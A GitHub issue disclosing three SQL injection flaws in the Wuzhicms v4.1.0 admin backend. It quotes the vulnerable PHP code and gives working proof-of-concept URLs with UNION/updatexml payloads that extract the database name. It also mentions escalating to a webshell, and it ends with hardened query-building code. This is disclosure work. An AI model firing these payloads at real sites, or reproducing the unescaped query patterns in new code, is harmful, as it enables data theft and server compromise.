There are 3 SQL injections in Wuzhicms v4.1.0 background #198

Open

tcyba opened this issue Sep 6, 2021 · 0 comments

tcyba commented Sep 6, 2021

There are 3 SQL injections in Wuzhicms v4.1.0 background

one

Wuzhicms v4.1.0 /coreframe/app/pay/admin/index.php has a SQL injection vulnerability.

Vulnerability file:

/coreframe/app/pay/admin/index.php 30-98

```php
    public function listing(){
        $fieldtypes = array('订单号', '手机号', '所属客服', '经销商');
        $keytype = isset($GLOBALS['keytype']) ? intval($GLOBALS['keytype']) : 0;
        $payments = $this->payments;
        $status_arr = $this->status_arr;
        $page = isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1;
        $page = max($page, 1);
        $status = $GLOBALS['status'];

        if ($status) {
            $where = 'status=' . $status;
        } else {
            $where = 'status>0';
        }
        if ($keytype) {
            $where .= " AND `keytype`='$keytype'";
        }
        // strip_tags() removes HTML tags only; quotes and SQL keywords pass through
        $keyValue = strip_tags($GLOBALS['keyValue']);
        $fieldtype = intval($GLOBALS['fieldtype']);
        if ($keyValue) {
            switch ($fieldtype) {
                case 0:
                    // $keyValue is interpolated directly into the WHERE clause
                    $where .= " AND `order_no`='$keyValue'";
                    break;
                case 1:
                    $where .= " AND `telephone`='$keyValue'";
                    break;
                case 2:
                    $where .= " AND `kf_username`='$keyValue'";
                    break;
                case 3:
                    $where .= " AND `jxs_username`='$keyValue'";
                    break;
            }
        }

        if ($_SESSION['role'] == 4) {
            // customer service
            $kf_username = get_cookie('username');
            $where .= " AND `kf_username`='$kf_username'";
        }
        $starttime = '';
        $endtime = '';
        if ($GLOBALS['starttime']) {
            $starttime = strtotime($GLOBALS['starttime']);
            $where .= " AND `addtime`>'$starttime'";
        }
        if ($GLOBALS['endtime']) {
            $endtime = strtotime($GLOBALS['endtime']);
            $where .= " AND `endtime`<'$endtime'";
        }
        if(isset($GLOBALS['exp'])) {
            $pagesize = 1000;
        } else {
            $pagesize = 20;
        }

        $admin_result = $this->db->get_list('admin', array('role' => 4), '*', 0, 20, 0);
        // the assembled $where string is handed to the query builder unchanged
        $result = $this->db->get_list('pay', $where, '*', 0, $pagesize, $page, 'id DESC');
        if(isset($GLOBALS['exp'])) {
            $this->export_excel($result);
        }
        $pages = $this->db->pages;
        $total = $this->db->number;
        $pay_config = get_config('pay_config');
        load_class('form');

        include $this->template('listing');
    }
```

The $keyValue parameter is not strictly filtered, causing a SQL injection vulnerability!

POC

/index.php?m=pay&f=index&v=listing&_su=wuzhicms&keyValue=1111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -


two

The second SQL injection and the first SQL injection are in different functions of the same file!

Wuzhicms v4.1.0 /coreframe/app/pay/admin/index.php has a SQL injection vulnerability.

Vulnerability file:

/coreframe/app/pay/admin/index.php 244-289

```php
    public function relay(){
        $id = intval($GLOBALS['id']);
        $r = $this->db->get_one('pay', array('id' => $id));
        $r2 = $this->db->get_one('pay_detail', array('id' => $id));
        $r = array_merge($r, $r2);
        $keyValue = '';
        $keyType = '';
        if (isset($GLOBALS['keyType'])) {
            // both the column name ($keyType) and the value ($keyValue) come from the request
            $keyType = $GLOBALS['keyType'];
            $keyValue = $GLOBALS['keyValue'];
            if ($keyValue) {
                $where = "modelid=11 AND `$keyType` LIKE '%$keyValue%'";
                $result = $this->db->get_list('member', $where, '*', 0, 20, 0, 'uid DESC');
            }
        } elseif (isset($GLOBALS['submit'])) {
            load_function('common', 'pay');
            $formdata = array();
            $formdata['order_no'] = create_order_no();
            $formdata['to_uid'] = intval($GLOBALS['to_uid']);
            $formdata['username'] = $r['linkman'];
            $formdata['mobile'] = $r['telephone'];
            $formdata['pinpai'] = $r['data1'];
            $formdata['chexing'] = $r['data3'];
            $formdata['addtime'] = $r['addtime'];
            $formdata['keytype'] = 0; // guest order
            $formdata['zftime'] = SYS_TIME;
            $this->db->insert('demand_relay', $formdata);
            $formdata2 = array();
            $formdata2['op_uid'] = $_SESSION['uid'];
            $formdata2['to_uid'] = intval($GLOBALS['to_uid']);
            $formdata2['to_username'] = $GLOBALS['to_username'];
            $formdata2['updatetime'] = SYS_TIME;
            $this->db->insert('demand_history', $formdata2);
            // $this->db->update('demand', array('flag'=>1),array('did' => $did));
            $this->db->update('pay', array('jxs_username' => $formdata2['to_username']), array('id' => $id));
            $forward = strip_tags($GLOBALS['forward']);
            MSG('发送成功', $forward);
        } else {
            $uid = $_SESSION['uid'];
            $where = "op_uid='$uid'";
            $data = $this->db->get_one('demand_history', $where, '*', 0, 'hid DESC');
            $forward = strip_tags($GLOBALS['forward']);

        }
        include $this->template('pay_relay');
    }
```

Set $keyType=uid and $keyValue to be controllable.

The $keyValue parameter is not strictly filtered, causing a SQL injection vulnerability!

POC

/index.php?m=pay&f=index&v=relay&_su=wuzhicms&keyType=uid&keyValue=111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -


three

Wuzhicms v4.1.0 /coreframe/app/order/admin/index.php has a SQL injection vulnerability.

Someone has already submitted a SQL injection vulnerability in the file /coreframe/app/order/admin/index.php (#175), but I found that, in addition to the $flag parameter, the $keyValue parameter can also be injected!

Vulnerability file:

coreframe/app/order/admin/index.php 22-87

```php
public function listing() {
    load_class('form');
    $fieldtypes = array('订单ID','标题','下单会员','物流单号');
    $flag = $GLOBALS['flag'];
    $status = array();
    $status[1] = '待发货';
    $status[2] = '已发货';
    $status[3] = '订单完成';

    $status_arr = $this->status_arr;
    $page = isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1;
    $page = max($page,1);
    // strip_tags() removes HTML tags only; quotes and SQL keywords pass through
    $keyValue = strip_tags($GLOBALS['keyValue']);
    $fieldtype = intval($GLOBALS['fieldtype']);
    $where = '1';
    if($keyValue) {
        switch($fieldtype) {
            case 0:
                $where .= " AND `order_no`='$keyValue'";
                break;
            case 1:
                // $keyValue is interpolated directly into the LIKE pattern
                $where .= " AND `remark` LIKE '%$keyValue%'";
                break;
            case 2:
                $r = $this->db->get_one('member', array('username' => $keyValue));
                $uid = $r['uid'];
                $where .= " AND `uid`='$uid'";
                break;
            case 3:
                $where .= " AND `snid`='$keyValue'";
                break;
        }
    }
    if($flag!='' && $flag==0 || $flag) $where .=" AND `status`='$flag'";
    $starttime = '';
    $endtime = '';
    if($GLOBALS['starttime']) {
        $starttime = strtotime($GLOBALS['starttime']);
        $where .= " AND `addtime`>'$starttime'";
    }
    if($GLOBALS['endtime']) {
        $endtime = strtotime($GLOBALS['endtime']);
        $where .= " AND `addtime`<'$endtime'";
    }
    $result_arr = $this->db->get_list('order_point', $where, '*', 0, 20,$page,'orderid DESC');
    // ... (remainder of listing() not included in the report)
}
```

Set $fieldtype=1 and $keyValue to be controllable.

The $keyValue parameter is not strictly filtered, causing a SQL injection vulnerability!

POC

http://yyds.upload/index.php?m=order&f=index&v=listing&_su=wuzhicms&keyValue=111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -&fieldtype=1


Multiple SQL injection vulnerabilities exist in wuzhicms v4.1.0
Allows attackers to execute arbitrary SQL commands via the $keyValue parameter in (1) the /coreframe/app/order/admin/index.php file and (2) the /coreframe/app/pay/admin/index.php file.
https://github.com/wuzhicms/wuzhicms/issues/198

Vulnerability verification process (https://github.com/wuzhicms/wuzhicms/issues/198)

Use SQL injection to elevate permissions and write a webshell.
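As an added illustration (not Wuzhicms code and not the reporter's), the two `$where` builders below show how the `listing()` and `relay()` searches can be assembled without `$keyValue`, `$status` or `$keyType` reaching the query text unescaped: column names come only from fixed allow-lists, numeric fields are cast with intval(), and string values pass through mysqli::real_escape_string. It assumes an open mysqli connection `$db`; `build_pay_where`, `build_member_where` and the `MEMBER_SEARCH_COLUMNS` list are hypothetical names.

```php
<?php
// Added example, not Wuzhicms code: hardened replacements for the $where
// construction in pay/admin/index.php listing() and relay(). Column names
// come only from fixed allow-lists; every value is cast to int or passed
// through mysqli::real_escape_string before it is interpolated.
// Assumes an open mysqli connection $db; the function names are hypothetical.

// Index -> column map matching the four search types of listing().
const PAY_SEARCH_COLUMNS = [0 => 'order_no', 1 => 'telephone', 2 => 'kf_username', 3 => 'jxs_username'];
// Constructed allow-list of member columns relay() may search on.
const MEMBER_SEARCH_COLUMNS = ['uid', 'username', 'mobile'];

// listing(): status, keyValue, starttime and endtime all came raw from $GLOBALS.
function build_pay_where(array $in, mysqli $db): string
{
    $parts = [];
    $status = isset($in['status']) ? intval($in['status']) : 0;
    $parts[] = $status > 0 ? 'status=' . $status : 'status>0';

    $fieldtype = isset($in['fieldtype']) ? intval($in['fieldtype']) : 0;
    $keyValue  = isset($in['keyValue']) ? trim(strip_tags($in['keyValue'])) : '';
    if ($keyValue !== '' && array_key_exists($fieldtype, PAY_SEARCH_COLUMNS)) {
        // Column taken from the map; value escaped for the connection charset, then quoted.
        $parts[] = sprintf("`%s`='%s'", PAY_SEARCH_COLUMNS[$fieldtype], $db->real_escape_string($keyValue));
    }

    // strtotime() returns false on garbage; only an integer timestamp reaches SQL.
    foreach (['starttime' => '`addtime`>%d', 'endtime' => '`endtime`<%d'] as $key => $fmt) {
        $ts = empty($in[$key]) ? false : strtotime($in[$key]);
        if ($ts !== false) {
            $parts[] = sprintf($fmt, $ts);
        }
    }
    return implode(' AND ', $parts);
}

// relay(): the original interpolated $keyType as a column name and $keyValue unescaped.
function build_member_where(array $in, mysqli $db): ?string
{
    $keyType  = $in['keyType'] ?? '';
    $keyValue = trim((string) ($in['keyValue'] ?? ''));
    if ($keyValue === '' || !in_array($keyType, MEMBER_SEARCH_COLUMNS, true)) {
        return null;   // unknown column or empty search: issue no query at all
    }
    // Escape LIKE wildcards first, then quote for SQL, so % and _ match literally.
    $like = $db->real_escape_string(addcslashes($keyValue, '%_\\'));
    return sprintf("modelid=11 AND `%s` LIKE '%%%s%%'", $keyType, $like);
}
```

Where the database layer accepts prepared statements, binding the value with `$stmt->bind_param()` is preferable to escaping, since escaping is only correct for the charset the connection is actually using.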
@tcyba tcyba changed the title There are 3 SQL injections in Wuzhicms v4.1.0 background 1 Sep 13, 2021
@tcyba tcyba closed this as completed Sep 13, 2021
@tcyba tcyba changed the title 1 There are 3 SQL injections in Wuzhicms v4.1.0 background Sep 13, 2021
@tcyba tcyba reopened this Sep 21, 2021